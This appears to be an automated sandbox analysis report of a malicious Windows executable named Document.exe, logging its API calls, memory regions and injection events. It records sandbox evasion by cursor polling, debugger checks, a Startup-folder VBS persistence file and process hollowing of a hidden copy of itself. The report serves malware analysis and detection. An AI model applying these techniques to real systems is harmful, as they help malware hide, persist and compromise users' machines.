Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollPos, address_out = 0x75491ccd	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollPos, address_out = 0x7549216d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollInfo, address_out = 0x754922be	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollRange, address_out = 0x754921e2	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SetLayeredWindowAttributes, address_out = 0x7785ec88	1	Fn
Module	Get Filename	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.EN, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 255	1	Fn
Module	Load	module_name = C3taUqjCU7eqAyIdAPzjF1nHWemMrup9L3lp460T2.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = mzfjTcKYjWs7xdfL71cu9tmd9Cw, base_address = 0x0	1	Fn
Module	Get Address	module_name = Unknown module name, function = AZMOMSaCRwayip0wWNKiES7U, address_out = 0x0	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x77841218	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	2	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 237, y_out = 471	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 237, y_out = 471	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
Module	Load	module_name = shell32, base_address = 0x76b00000	1	Fn
Module	Load	module_name = user32, base_address = 0x77820000	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Filename	module_name = Unknown module name, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 260	1	Fn
Debug	Check for Presence	c:\users\aetadzjz\appdata\roaming\document\document.exe	1	Fn
Debug	Check for Presence	c:\users\aetadzjz\appdata\roaming\document\document.exe	1	Fn
Module	Get Handle	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, base_address = 0x400000	1	Fn
Module	Get Filename	module_name = Unknown module name, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 260	2	Fn
File	Delete	filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOCUMENT.vbs	1	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOCUMENT.vbs, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE	1	Fn
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOCUMENT.vbs, size = 141	1	Fn Data
Module	Get Handle	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, base_address = 0x400000	83	Fn
Process	Create	process_name = "C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe", os_pid = 0xa38, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Thread	Get Context	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, os_tid = 0x600	1	Fn
Module	Unmap	process_name = "C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe"	1	Fn
Module	Create Mapping	protection = PAGE_EXECUTE_READWRITE, maximum_size = 1635984	1	Fn
Module	Map	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1ee0000	1	Fn
Module	Map	process_name = "C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe", protection = PAGE_EXECUTE_READWRITE, address_out = 0x400000	1	Fn
Module	Create Mapping	protection = PAGE_EXECUTE_READWRITE, maximum_size = 1635984	1	Fn
Module	Map	process_name = "C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe", protection = PAGE_EXECUTE_READWRITE, address_out = 0x1a0000	1	Fn
Module	Map	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x530000	1	Fn
Thread	Set Context	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, os_tid = 0x600	1	Fn
Thread	Resume	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, os_tid = 0x600	1	Fn
Module	Get Filename	module_name = Unknown module name, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 260	1	Fn
System	Get Time	type = Ticks, time = 220554	1	Fn
Process	Create	process_name = "C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe" 2 2616 18220554, os_pid = 0xa68, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, show_window = SW_HIDE	1	Fn

Process #8: document.exe

841

0

»

Information	Value
ID	#8
File Name	c:\users\aetadzjz\appdata\roaming\document\document.exe
Command Line	"C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:12, Reason: Child Process
Unmonitor	End Time: 00:03:25, Reason: Self Terminated
Monitor Duration	00:00:13

OS Process Information

»

Information	Value
PID	0xa38
Parent PID	0x81c (c:\users\aetadzjz\appdata\roaming\document\document.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 94C

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a0fff	Pagefile Backed Memory	rwx	-
locale.nls	0x001b0000	0x00216fff	Memory Mapped File	r	-
private_0x0000000000220000	0x00220000	0x0022ffff	Private Memory	rw	-
rsaenh.dll	0x00230000	0x0026bfff	Memory Mapped File	r	-
pagefile_0x0000000000230000	0x00230000	0x00236fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000240000	0x00240000	0x00241fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000250000	0x00250000	0x00251fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00260000	0x00260fff	Memory Mapped File	r	-
tzres.dll	0x00260000	0x00260fff	Memory Mapped File	r	-
iexplore.exe.mui	0x00260000	0x00261fff	Memory Mapped File	rw	-
private_0x0000000000270000	0x00270000	0x0027ffff	Private Memory	rw	-
private_0x0000000000280000	0x00280000	0x002dffff	Private Memory	rw	-
pagefile_0x0000000000280000	0x00280000	0x00281fff	Pagefile Backed Memory	r	-
private_0x00000000002d0000	0x002d0000	0x002dffff	Private Memory	rw	-
private_0x0000000000340000	0x00340000	0x003bffff	Private Memory	rw	-
document.exe	0x00400000	0x004b2fff	Memory Mapped File	rwx	... Region Actions Download Dump
pagefile_0x0000000000400000	0x00400000	0x0042bfff	Pagefile Backed Memory	rwx	-
pagefile_0x0000000000430000	0x00430000	0x005b7fff	Pagefile Backed Memory	r	-
private_0x00000000005c0000	0x005c0000	0x006bffff	Private Memory	rw	-
pagefile_0x00000000006c0000	0x006c0000	0x00840fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000850000	0x00850000	0x01c4ffff	Pagefile Backed Memory	r	-
private_0x0000000001c50000	0x01c50000	0x0204ffff	Private Memory	rw	-
sortdefault.nls	0x02050000	0x0231efff	Memory Mapped File	r	-
private_0x0000000002320000	0x02320000	0x0246ffff	Private Memory	rw	-
private_0x0000000002320000	0x02320000	0x0239ffff	Private Memory	rw	-
private_0x00000000023a0000	0x023a0000	0x0241ffff	Private Memory	rw	-
private_0x0000000002430000	0x02430000	0x0246ffff	Private Memory	rw	-
private_0x0000000002470000	0x02470000	0x0261ffff	Private Memory	rw	-
pagefile_0x0000000002470000	0x02470000	0x0254efff	Pagefile Backed Memory	r	-
~df8f3ab6037267860d.tmp	0x02550000	0x025cffff	Memory Mapped File	rw	... Region Actions Download Dump
private_0x00000000025e0000	0x025e0000	0x0261ffff	Private Memory	rw	-
pagefile_0x0000000002620000	0x02620000	0x02a1ffff	Pagefile Backed Memory	rw	-
private_0x0000000002a20000	0x02a20000	0x02a9ffff	Private Memory	rw	-
pagefile_0x0000000002aa0000	0x02aa0000	0x02e92fff	Pagefile Backed Memory	r	-
staticcache.dat	0x02ea0000	0x037cffff	Memory Mapped File	r	-
private_0x00000000037d0000	0x037d0000	0x038cffff	Private Memory	rw	-
private_0x00000000038d0000	0x038d0000	0x03a79fff	Private Memory	rw	-
iexplore.exe	0x038d0000	0x03975fff	Memory Mapped File	rwx	-
msvbvm60.dll	0x72940000	0x72a92fff	Memory Mapped File	rwx	-
dwmapi.dll	0x751f0000	0x75202fff	Memory Mapped File	rwx	-
uxtheme.dll	0x75210000	0x7528ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x752a0000	0x752a7fff	Memory Mapped File	rwx	-
wow64win.dll	0x752b0000	0x7530bfff	Memory Mapped File	rwx	-
wow64.dll	0x75310000	0x7534efff	Memory Mapped File	rwx	-
comctl32.dll	0x755f0000	0x7578dfff	Memory Mapped File	rwx	-
rsaenh.dll	0x75790000	0x757cafff	Memory Mapped File	rwx	-
cryptsp.dll	0x757d0000	0x757e5fff	Memory Mapped File	rwx	-
sxs.dll	0x757f0000	0x7584efff	Memory Mapped File	rwx	-
cryptbase.dll	0x75970000	0x7597bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75980000	0x759dffff	Memory Mapped File	rwx	-
sechost.dll	0x759e0000	0x759f8fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75a10000	0x75abbfff	Memory Mapped File	rwx	-
imm32.dll	0x75c00000	0x75c5ffff	Memory Mapped File	rwx	-
shlwapi.dll	0x75c60000	0x75cb6fff	Memory Mapped File	rwx	-
ole32.dll	0x75cf0000	0x75e4bfff	Memory Mapped File	rwx	-
msctf.dll	0x75e50000	0x75f1bfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75f40000	0x75f85fff	Memory Mapped File	rwx	-
psapi.dll	0x75f90000	0x75f94fff	Memory Mapped File	rwx	-
usp10.dll	0x75fa0000	0x7603cfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x760d0000	0x761bffff	Memory Mapped File	rwx	-
kernel32.dll	0x76220000	0x7632ffff	Memory Mapped File	rwx	-
advapi32.dll	0x76490000	0x7652ffff	Memory Mapped File	rwx	-
oleaut32.dll	0x76720000	0x767aefff	Memory Mapped File	rwx	-
gdi32.dll	0x76a70000	0x76afffff	Memory Mapped File	rwx	-
lpk.dll	0x77810000	0x77819fff	Memory Mapped File	rwx	-
user32.dll	0x77820000	0x7791ffff	Memory Mapped File	rwx	-
private_0x0000000077a20000	0x77a20000	0x77b19fff	Private Memory	rwx	-
private_0x0000000077b20000	0x77b20000	0x77c3efff	Private Memory	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
ntdll.dll	0x77e20000	0x77f9ffff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#7: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x600	address = 0x400000, size = 180224	1	Fn
Modify Memory	#7: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x600	address = 0x1a0000, size = 4096	1	Fn
Modify Control Flow	#7: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x600	os_tid = 0x94c, address = 0x77e301c4	1	Fn

Threads

Thread 0x94c

841

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 260	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76235235	1	Fn
Mutex	Create	-	1	Fn
Module	Get Handle	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, base_address = 0x400000	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260	1	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 260	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Load	module_name = OLEAUT32.DLL, base_address = 0x76720000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x767870a1	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76720000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x76733dcf	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x767307b7	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x76751ca9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x76738e70	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x76737684	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x7673cc98	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x7676903a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x76736231	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x76735fea	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x76743f94	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x76744e9e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x7676db72	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x76752a8c	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x7676d737	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x7676e015	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x7676cc3d	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x7676d1c4	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x7676d48c	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x7676d4c6	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x7676d509	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x7673e7bb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x7673e496	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x7673ddf1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x7676d53f	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x76772055	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x767720ea	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x76772151	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x767721f5	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x76772288	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x76772335	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x767723d5	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x76745934	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x76745a98	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x767459b4	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7679e405	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x7679ef07	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7679f00a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x7679ef47	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7679f15e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7679dbd4	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7679ecfa	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x7679ea66	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7679d332	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7679ee2e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x7679ca11	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x7679cc5f	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x7679cde7	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7679c802	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7679ec66	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x7679d155	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x7673b0dc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x76755f3e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x76744fd0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x76740d2c	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x767559ed	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x7672f8b8	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75cf0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75d39d4e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75d00782	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 260	2	Fn
Module	Load	module_name = SXS.DLL, base_address = 0x757f0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75837685	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x77837d2f	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x77843150	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x7785e7a0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x77845281	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x7784451a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x77844413	1	Fn
Window	Create	class_name = ThunderRT6Main, wndproc_parameter = 0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors	1	Fn
System	Register Hook	type = WH_MSGFILTER, hookproc_address = 0x729a1e09	1	Fn
Window	Create	class_name = VBMsoStdCompMgr, wndproc_parameter = 0	1	Fn
Window	Set Attribute	class_name = VBMsoStdCompMgr, index = 0, new_long = 37101724	1	Fn
Window	Create	class_name = VBFocusRT6, wndproc_parameter = 0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors	1	Fn
System	Get Info	type = Operating System	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Window	Create	window_name = XCIV, wndproc_parameter = 0	1	Fn
Window	Create	wndproc_parameter = 0	1	Fn
Window	Create	window_name = 1, wndproc_parameter = 0	1	Fn
Window	Create	wndproc_parameter = 0	1	Fn
Window	Create	window_name = 2, wndproc_parameter = 0	1	Fn
Window	Create	window_name = Run Selected, wndproc_parameter = 0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76231245	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76231222	1	Fn
